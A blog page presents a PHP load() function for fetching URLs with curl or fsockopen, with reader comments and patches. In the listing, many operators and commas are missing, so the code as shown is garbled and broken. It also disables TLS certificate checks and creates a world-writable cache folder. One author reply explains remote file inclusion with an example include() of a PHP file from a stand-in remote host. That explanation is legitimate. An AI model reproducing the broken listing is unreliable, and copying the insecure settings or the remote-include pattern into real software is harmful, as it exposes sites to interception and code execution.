load() Function for PHP - Fetch URL Content

I recently had to develop a small script that will fetch an XML file from the web. All I had to do is download a given URL and read its contents. To my great surprise I found that download the file using my jx Ajax library was much easier than doing it with PHP.

PHP make this very easy by including functions like file_get_contents() that has URL support. This code will get you the contents of an URL.

$contents = file_get_contents('http://example.com/rss.xml');

Unfortunately, this is a huge security threat - and many servers have disabled this feature in PHP. Also this is not the most optimized method to fetch an URL. Also, it is impossible to submit data using the POST method using this function.

Other Options - curl and fsockopen

PHP provide other two method to fetch an URL - Curl and Fsockopen. But to use this I have to write a lot more code.

load()

So I decided to create my own function that makes it much more easier.

Features

Options

The first argument of this function is the URL to be fetched. The second argument is an associative array. This is an optional argument. The following values are supported in this array.

return_info
Possible values - true/false
If this is true, the function will return an associative array rather than just a string. The array will contain 3 elements...
headers
An associative array containing all the headers returned by the server.
body
A string - the contents of the URL.
info
Some information about the fetch. This is the result returned by the 'curl_getinfo()' function. Supported only with Curl.
method
Possible Values - post/get
Specifies the method to be used.
modified_since
If this option is set, the 'If-Modified-Since' header will be used. This will make sure that the URL will be fetched only it was modified.

Examples

The code to fetch the contents of an URL will look like this...

$contents = load('http://example.com/rss.xml');

Simple, no? This will just return the contents of the URL. If you need to do more complex stuff, just use the second argument to pass more options...

$options = array(
	'return_info'	=> true,
	'method'		=> 'post'
);
$result = load('http://www.bin-co.com/rss.xml.php?section=2',$options);
print_r($result);

The output will be like this...

Array
(
    [headers] => Array
        (
            [Date] => Mon, 18 Jun 2007 13:56:22 GMT
            [Server] => Apache/2.0.54 (Unix) PHP/4.4.7 mod_ssl/2.0.54 OpenSSL/0.9.7e mod_fastcgi/2.4.2 DAV/2 SVN/1.4.2
            [X-Powered-By] => PHP/5.2.2
            [Expires] => Thu, 19 Nov 1981 08:52:00 GMT
            [Cache-Control] => no-store, no-cache, must-revalidate, post-check=0, pre-check=0
            [Pragma] => no-cache
            [Set-Cookie] => PHPSESSID=85g9n1i320ao08kp5tmmneohm1; path=/
            [Last-Modified] => Tue, 30 Nov 1999 00:00:00 GMT
            [Vary] => Accept-Encoding
            [Transfer-Encoding] => chunked
            [Content-Type] => text/xml
        )
	[body] => ... Contents of the Page ...
	[info] => Array
        (
            [url] => http://www.bin-co.com/rss.xml.php?section=2
            [content_type] => text/xml
            [http_code] => 200
            [header_size] => 501
            [request_size] => 146
            [filetime] => -1
            [ssl_verify_result] => 0
            [redirect_count] => 0
            [total_time] => 1.113792
            [namelookup_time] => 0.180019
            [connect_time] => 0.467973
            [pretransfer_time] => 0.468035
            [size_upload] => 0
            [size_download] => 2274
            [speed_download] => 2041
            [speed_upload] => 0
            [download_content_length] => 0
            [upload_content_length] => 0
            [starttransfer_time] => 0.826031
            [redirect_time] => 0
        )
)

Code

<?php
/**
 * See http://www.bin-co.com/php/scripts/load/
 * Version : 2.00.A
 */
function load($url,$options=array()) {
    
$default_options = array(
        
'method'        => 'get',
        
'return_info'    => false,
        
'return_body'    => true,
        
'cache'            => false,
        
'referer'        => '',
        
'headers'        => array(),
        
'session'        => false,
        
'session_close'    => false,
    );
    
// Sets the default options.
    
foreach($default_options as $opt=>$value) {
        if(!isset(
$options[$opt])) $options[$opt] = $value;
    }

    
$url_parts parse_url($url);
    
$ch false;
    
$info = array(//Currently only supported by curl.
        
'http_code'    => 200
    
);
    
$response '';
    
    
$send_header = array(
        
'Accept' => 'text/*',
        
'User-Agent' => 'BinGet/1.00.A (http://www.bin-co.com/php/scripts/load/)'
    
) + $options['headers']; // Add custom headers provided by the user.
    
    
if($options['cache']) {
        
$cache_folder '/tmp/php-load-function/';
        if(isset(
$options['cache_folder'])) $cache_folder $options['cache_folder'];
        if(!
file_exists($cache_folder)) {
            
$old_umask umask(0); // Or the folder will not get write permission for everybody.
            
mkdir($cache_folder0777);
            
umask($old_umask);
        }
        
        
$cache_file_name md5($url) . '.cache';
        
$cache_file joinPath($cache_folder$cache_file_name); //Don't change the variable name - used at the end of the function.
                
        
if(file_exists($cache_file)) { // Cached file exists - return that.
            
$response file_get_contents($cache_file);
            
             
//Seperate header and content
            
$separator_position strpos($response,"\r\n\r\n");
            
$header_text substr($response,0,$separator_position);
            
$body substr($response,$separator_position+4);
            
            foreach(
explode("\n",$header_text) as $line) {
                
$parts explode(": ",$line);
                if(
count($parts) == 2$headers[$parts[0]] = chop($parts[1]);
            }
            
$headers['cached'] = true;
            
            if(!
$options['return_info']) return $body;
            else return array(
'headers' => $headers'body' => $body'info' => array('cached'=>true));
        }
    }

    
///////////////////////////// Curl /////////////////////////////////////
    //If curl is available, use curl to get the data.
    
if(function_exists("curl_init"
                and (!(isset(
$options['use']) and $options['use'] == 'fsocketopen'))) { //Don't use curl if it is specifically stated to use fsocketopen in the options
        
        
if(isset($options['post_data'])) { //There is an option to specify some data to be posted.
            
$page $url;
            
$options['method'] = 'post';
            
            if(
is_array($options['post_data'])) { //The data is in array format.
                
$post_data = array();
                foreach(
$options['post_data'] as $key=>$value) {
                    
$post_data[] = "$key=" urlencode($value);
                }
                
$url_parts['query'] = implode('&'$post_data);
            
            } else { 
//Its a string
                
$url_parts['query'] = $options['post_data'];
            }
        } else {
            if(isset(
$options['method']) and $options['method'] == 'post') {
                
$page $url_parts['scheme'] . '://' $url_parts['host'] . $url_parts['path'];
            } else {
                
$page $url;
            }
        }

        if(
$options['session'] and isset($GLOBALS['_binget_curl_session'])) $ch $GLOBALS['_binget_curl_session']; //Session is stored in a global variable
        
else $ch curl_init($url_parts['host']);
        
        
curl_setopt($chCURLOPT_URL$page) or die("Invalid cURL Handle Resouce");
        
curl_setopt($chCURLOPT_RETURNTRANSFERtrue); //Just return the data - not print the whole thing.
        
curl_setopt($chCURLOPT_HEADERtrue); //We need the headers
        
curl_setopt($chCURLOPT_NOBODY, !($options['return_body'])); //The content - if true, will not download the contents. There is a ! operation - don't remove it.
        
if(isset($options['method']) and $options['method'] == 'post' and isset($url_parts['query'])) {
            
curl_setopt($chCURLOPT_POSTtrue);
            
curl_setopt($chCURLOPT_POSTFIELDS$url_parts['query']);
        }
        
//Set the headers our spiders sends
        
curl_setopt($chCURLOPT_USERAGENT$send_header['User-Agent']); //The Name of the UserAgent we will be using ;)
        
$custom_headers = array("Accept: " $send_header['Accept'] );
        if(isset(
$options['modified_since']))
            
array_push($custom_headers,"If-Modified-Since: ".gmdate('D, d M Y H:i:s \G\M\T',strtotime($options['modified_since'])));
        
curl_setopt($chCURLOPT_HTTPHEADER$custom_headers);
        if(
$options['referer']) curl_setopt($chCURLOPT_REFERER$options['referer']);

        
curl_setopt($chCURLOPT_COOKIEJAR"/tmp/binget-cookie.txt"); //If ever needed...
        
curl_setopt($chCURLOPT_FOLLOWLOCATIONtrue);
        
curl_setopt($chCURLOPT_MAXREDIRS5);
        
curl_setopt($chCURLOPT_SSL_VERIFYPEERfalse);

        if(isset(
$url_parts['user']) and isset($url_parts['pass'])) {
            
$custom_headers = array("Authorization: Basic ".base64_encode($url_parts['user'].':'.$url_parts['pass']));
            
curl_setopt($chCURLOPT_HTTPHEADER$custom_headers);
        }

        
$response curl_exec($ch);
        
$info curl_getinfo($ch); //Some information on the fetch
        
        
if($options['session'] and !$options['session_close']) $GLOBALS['_binget_curl_session'] = $ch//Dont close the curl session. We may need it later - save it to a global variable
        
else curl_close($ch);  //If the session option is not set, close the session.

    //////////////////////////////////////////// FSockOpen //////////////////////////////
    
} else { //If there is no curl, use fsocketopen - but keep in mind that most advanced features will be lost with this approch.
        
if(isset($url_parts['query'])) {
            if(isset(
$options['method']) and $options['method'] == 'post')
                
$page $url_parts['path'];
            else
                
$page $url_parts['path'] . '?' $url_parts['query'];
        } else {
            
$page $url_parts['path'];
        }
        
        if(!isset(
$url_parts['port'])) $url_parts['port'] = 80;
        
$fp fsockopen($url_parts['host'], $url_parts['port'], $errno$errstr30);
        if (
$fp) {
            
$out '';
            if(isset(
$options['method']) and $options['method'] == 'post' and isset($url_parts['query'])) {
                
$out .= "POST $page HTTP/1.1\r\n";
            } else {
                
$out .= "GET $page HTTP/1.0\r\n"//HTTP/1.0 is much easier to handle than HTTP/1.1
            
}
            
$out .= "Host: $url_parts[host]\r\n";
            
$out .= "Accept: $send_header[Accept]\r\n";
            
$out .= "User-Agent: {$send_header['User-Agent']}\r\n";
            if(isset(
$options['modified_since']))
                
$out .= "If-Modified-Since: ".gmdate('D, d M Y H:i:s \G\M\T',strtotime($options['modified_since'])) ."\r\n";

            
$out .= "Connection: Close\r\n";
            
            
//HTTP Basic Authorization support
            
if(isset($url_parts['user']) and isset($url_parts['pass'])) {
                
$out .= "Authorization: Basic ".base64_encode($url_parts['user'].':'.$url_parts['pass']) . "\r\n";
            }

            
//If the request is post - pass the data in a special way.
            
if(isset($options['method']) and $options['method'] == 'post' and $url_parts['query']) {
                
$out .= "Content-Type: application/x-www-form-urlencoded\r\n";
                
$out .= 'Content-Length: ' strlen($url_parts['query']) . "\r\n";
                
$out .= "\r\n" $url_parts['query'];
            }
            
$out .= "\r\n";

            
fwrite($fp$out);
            while (!
feof($fp)) {
                
$response .= fgets($fp128);
            }
            
fclose($fp);
        }
    }

    
//Get the headers in an associative array
    
$headers = array();

    if(
$info['http_code'] == 404) {
        
$body "";
        
$headers['Status'] = 404;
    } else {
        
//Seperate header and content
        
$header_text substr($response0$info['header_size']);
        
$body substr($response$info['header_size']);
        
        foreach(
explode("\n",$header_text) as $line) {
            
$parts explode(": ",$line);
            if(
count($parts) == 2$headers[$parts[0]] = chop($parts[1]);
        }
    }
    
    if(isset(
$cache_file)) { //Should we cache the URL?
        
file_put_contents($cache_file$response);
    }

    if(
$options['return_info']) return array('headers' => $headers'body' => $body'info' => $info'curl_handle'=>$ch);
    return 
$body;

License

BSD License

Comments

Anonymous at 27 Oct, 2007 12:14
Thanks ! the script is easy to use
Reply to this.
What is a URL? at 23 Nov, 2007 03:45
Does this retrieve all the HTML of the URL in question? If so, then how does it differ from file()?
Reply to this.
Binny V A at 25 Nov, 2007 06:22
In some servers, file() cannot fetch an URL. There is an option in PHP to disable it. Since it is considered to be a security threat, many admins have disabled it. In such cases, you can use this function.
Reply to this.
Anonymous at 12 Jan, 2008 06:24
wow! Straight forward programming, good documentation ... a pleasure to use =)
Reply to this.
Anonymous at 20 Feb, 2008 09:39
Awesome function. Had to change some small stuff thou cause i got some weird numbers in my $body output.

$body = substr($response,$separator_position+4);
i hade to change to:
$body = substr($response,$separator_position+9);

and then a
$body = substr($body,0,-5);
cause there was a 0 at the end.

otherwise awesome job! =)

-gob
Reply to this.
Ashkan at 01 Mar, 2008 01:37
great! thanks a lot. it make me faster doing my works!
Reply to this.
Anonymous at 05 Mar, 2008 11:34
hi
how can i save the contents of the url or download it using this script
i need to download it and save it like HTML file ..

example : when you clicl file > save as .. the page will saved in HTML file Whit Images ..
Reply to this.
Brad at 15 Mar, 2008 02:53
And once again simply awesome - thanks!
Reply to this.
Anonymous at 16 Mar, 2008 06:35
what would be the code if i want to fetch full wvm path from zdsahre.net?
Reply to this.
Anonymous at 18 Mar, 2008 11:45
thank you very very much, it solves all my problems, simply..
Reply to this.
Stumbled upon at 05 Jun, 2008 05:34
This is just excellent, exactly what I needed. Thanks for sharing!
Reply to this.
Tim at 05 Jun, 2008 12:18
Very nice, thx.
Reply to this.
Anonymous at 02 Jul, 2008 06:42
great snippet...consider encapsulating it in a class for easy consumption.
Reply to this.
arun dwivedi at 07 Jul, 2008 01:46
hi arun
Reply to this.
arun dwivedi at 07 Jul, 2008 09:19
how can use rollback with php function
Reply to this.
dheen at 15 Jul, 2008 09:17
i just copied the above coding...and i was running it but codings were printed in that page...pls help me..
do i need to make any change..?
Reply to this.
dheen at 15 Jul, 2008 10:00
what does $option do in the first line...do i need to call the function load from outside..
if i need to call that what i should pass to the $options..
Reply to this.
Adrian at 21 Jul, 2008 12:47
Great script.

Thanks and really useful.

One thing it doesn't handle, is fetching code on different ports. I'm trying to pull a file on port 8080.

Any ideas?
Reply to this.
Mark at 29 Jul, 2008 03:16
Thanks for posting this!
Reply to this.
Roshan Bhattarai at 12 Sep, 2008 04:10
hey bini......thanks for sharing such a great script.....cheers
Reply to this.
Anonymous at 12 Sep, 2008 04:32
Why is file_get_contents a security threat?
Reply to this.
Binny V A at 12 Sep, 2008 12:10
The handling of url as a local file is a security threat - not that function. For example, an attacker could add the code ...
include('http://remotesite.com/spamming_php_file.txt'); - it will be executed as PHP code if this feature is turned on.
Reply to this.
Anonymous at 14 Jan, 2009 04:08
Could you elaborate? Does this script pose a security threat as well? Is there a risk of injection attacks? -Thanks!
Reply to this.
tozo at 19 Sep, 2008 12:58
Hi.

I have one question. I would like to execute form on anothere server.
For on other servers pages looks something like this :

<form id="calculate_score" action="" method="post">
<input type="hidden" name="cmd" value="calculate" />
<input type="text" id="month_payment" name="score" class="input" value="" />
<input type="image" src="/dsg/sl/calculate.gif" class="button" />
</form>

Is it posible to send data with load function (post method) so I could enter values manualy and just retreive the result.

Thnx.
Reply to this.
Anonymous at 28 Sep, 2008 11:59
very good piece of code! works like a charm! thank you
Reply to this.
cartagena at 13 Oct, 2008 08:29
Perfect,,,, a great alternative to file_get_contents.... That's why i love PHP.
Thanks
Reply to this.
Anonymous at 06 Nov, 2008 05:04
Great work!
Reply to this.
Anonymous at 19 Nov, 2008 10:45
Thank you. Saved me probably hours of programming to get some JSON stream data on my webpage
Reply to this.
rahul at 08 Dec, 2008 02:37
I HAVE ONE QUESTION:SUPPOSE I AM RUNNING A PARTICULAR PAGE ON ONE SERVER AND ANOTHER ON ANOTHER SERVER,IF I WANT TO GO FROM ONE PAGE OF ONE SERVER TO OTHER PAGE THAT IS RUNNING ON ANOTHER SERVER HOW CAN I MAINTAIN THE SESSION
Reply to this.
Paul Tarjan at 23 Dec, 2008 11:02
To deal with other ports, change the line:
---
$fp = fsockopen($url_parts['host'], 80, $errno, $errstr, 30);
---

to

---
if(!isset($url_parts['port'])) $url_parts['port'] = 80;

$fp = fsockopen($url_parts['host'], $url_parts['port'], $errno, $errstr, 30);
---
Reply to this.
Jani at 29 Jan, 2009 10:14
Hi!

Great work!
I have one note:
if I use it and has to redirect it, the new url's header in $results['body'] of top as plain text , and not in $results['headers']. But $results['info'] is OK, but not full (Content-Length, Date, etc...).
Example:
$result = load('http://google.com',$options); //redirect to www.google.com
print_r($results);

Sorry my bad english.
Reply to this.
Binny V A at 31 Jan, 2009 05:21
I have update the script to the latest version - it has fixed this issue. And added a lot of new features too.
Reply to this.
Florian at 26 Feb, 2009 02:28
Thanks, this is great, and easy!
Reply to this.
Anonymous at 18 Mar, 2009 12:04
WOW ... AMAZING FUNCTION. Great work !!!
Reply to this.
a1291762 at 14 Apr, 2009 08:25
I tried to use this and found out that without cURL it's a bit limited. I have corrected some of the limitations.

The patch allows fsockopen to connect to a https:// URL. It also calculates the header_size so the header/body splitting/parsing code works.

http://yasmar.net/load_fix_fsockopen.diff
Reply to this.
a1291762 at 16 Apr, 2009 09:27
Some more patches that I've made...

Fix the sending of headers (while I didn't test it, the curl code didn't seem right, the fsockopen code didn't handle it at all).
http://yasmar.net/fix_sending_headers.diff

Allow receiving multiple headers with the same name (eg. Set-Cookie: appear multiple times when multiple cookies are being set). This leaves the $headers['header'] behavior intact and simply changes the value from a string to an array of strings.
http://yasmar.net/multiple_headers_receive.diff

Retrieve the HTTP response code when using fsockopen.
http://yasmar.net/fsockopen_http_response.diff

Send multiple headers with the same name (a mirror implementation of the receiving multiple headers patch).
http://yasmar.net/multiple_headers_send.diff
Reply to this.
Binny V A at 22 Apr, 2009 11:37
Thanks! I'll review the code and add these patches into function. Thanks for sharing.
Reply to this.
a1291762 at 22 Apr, 2009 08:56
I'm now retrieving an attachment and the end of the headers is not an empty line but a line with a single piece of white space. This patch updates the fsockopen code to check for 'only whitespace' instead of 'empty line' when finding the end of the headers.

http://yasmar.net/load_fsockopen_non_empty_line.diff
Reply to this.
a1291762 at 23 Apr, 2009 12:10
Oops. Turns out that last patch was an incorrect fix for a parsing bug. Here's a patch (on top of that patch) that corrects the situation. Embarrassingly, this logic was already there (up in the curl bit). With the non_empty_line patch you can download text attachments. With this patch on top, you can also download binary attachments.

http://yasmar.net/load_fsockopen_headers_end.diff
Reply to this.
Desi at 24 Apr, 2009 08:26
alienlinkz@gmail.com
can someone tell me how to use this script
please
I am trying to fetch new from yahoo to my website.
Reply to this.
Matt at 28 Apr, 2009 01:27
Hi there

I have this working well, retrieving text. However, I have been trying to also use it for retrieving a PNG from a remote server and then saving this to my local server and it doesn't work. I can get it to work using feof and feof really well, but it doesn't work on alls servers which is why I am trying to use this.

Could someone please provide me with a sample of what to do to get this to work please? It saves the data, but isn't being recognised as a PNG file. I guess the data is corrupt for some reason.

Oh, and a1291762, is there any chance you can link to the entire updated script rather than just diffs?

Thanks
Reply to this.
Matt at 28 Apr, 2009 01:30
Sorry, I meant fopen and fwrite.
Reply to this.
a1291762 at 29 Apr, 2009 12:22
Matt, perhaps the file is being "converted" when writing (ie. automatic line ending conversion).

My code does not actually write out the file at any point. It simply fetches and then serves to the browser (effectively acting as a proxy). The code looks like this.

# Fetch the attachment (needs cookies)
$attachment = load($this->source_url, array('return_info' => true,
'headers' => array('Cookie' => session()->cookie())));

# Serve up the headers that I got (at least some of them will be important)
foreach ($attachment['headers'] as $header => $data) {
# Any text/* types get served as text/plain.
# I HATE it when the browser doesn't let me view TEXT files!
if ($header == 'Content-Type' && preg_match('/^text\//', $data)) {
header('Content-Type: text/plain');
continue;
}
if (!is_array($data)) {
$data = array($data);
}
foreach ($data as $value) {
header($header.': '.$value.'
');
}
}

# Now serve up the contents of the file.
echo $attachment['body'];


The full script I have is here: http://yasmar.net/load.php. Note that this is not quite original + patches. There is a raw POST hack I stuck in so I could upload files to a remote server but it's only for the fsockopen case. I was planning on making it work with curl before posting as a patch.
Reply to this.
a1291762 at 30 Apr, 2009 12:18
This patch makes the fsockopen case able to use the post_data feature (no sense in keeping it curl-only right?).
http://yasmar.net/fsockopen_post_data.diff

This adds support for multipart-encoded POSTs (cURL and fsockopen). This allows you to upload files.
http://yasmar.net/multipart_post.diff

This makes use of two helper functions (sourced from around the internets). It was designed around fsockopen's requirements and retrofitted to curl. fsockopen needs more data than curl does so the 'multipart_data' field you are expected to fill out has more options than you might expect (the same input is used so that the 'use curl or fall back to fsockopen' logic can still work).

Anyway, here is an example of how to upload with this new feature (in this case, attaching a file to a JIRA task).

$url = 'https://'.JIRA_HOST.'/secure/AttachFile.jspa';
$upload = array('filename.1' => array('filename' => $file_name, 'type' => $mime_type, 'binary' => true, 'contents' => $file_contents),
'filename.2' => array('filename' => '', 'type' => 'application/octet-stream'),
'filename.3' => array('filename' => '', 'type' => 'application/octet-stream'),
'comment' => array(),
'commentLevel' => array(),
'id' => array('contents' => $id),
'Attach' => array('contents' => 'Attach'));
load($url, array(x'headers' => array('Cookie' => $cookies),
'method' => 'post', 'multipart_data' => $upload));

Just for Matt, the whole enchilada can be found here.
http://yasmar.net/load.php.txt

Note that I'm not interested in maintaining a fork or anything so don't ask me for support. This was tested with both cURL and fsockopen but only for the case presented here (attaching a file to a JIRA task).
Reply to this.
prem ypi at 16 May, 2009 01:48
This is really safe method to use now. Fetching using the default php function has few security flaws. May be you should try to commit your piece of code in the default fetch (or have separate function as 'safe_load' etc.
Reply to this.
jaswant tak at 25 May, 2009 01:22
Very nice mate,

A great help

Thanks a lot.

cheers
Reply to this.
Anonymous at 25 Jun, 2009 01:17
Thanks, great function!
Reply to this.
Comment

Please dont enter you comments in this form - this is a fake form to confuse spamming bots. The next form is the real one.




Comment




Comment Formating : HTML tags a, strong, em, b, i, code, pre, p and br allowed. Other tags will be shown as code(< will become &lt;). Urls, Line breaks will be auto-formated.
Subscribe to Feed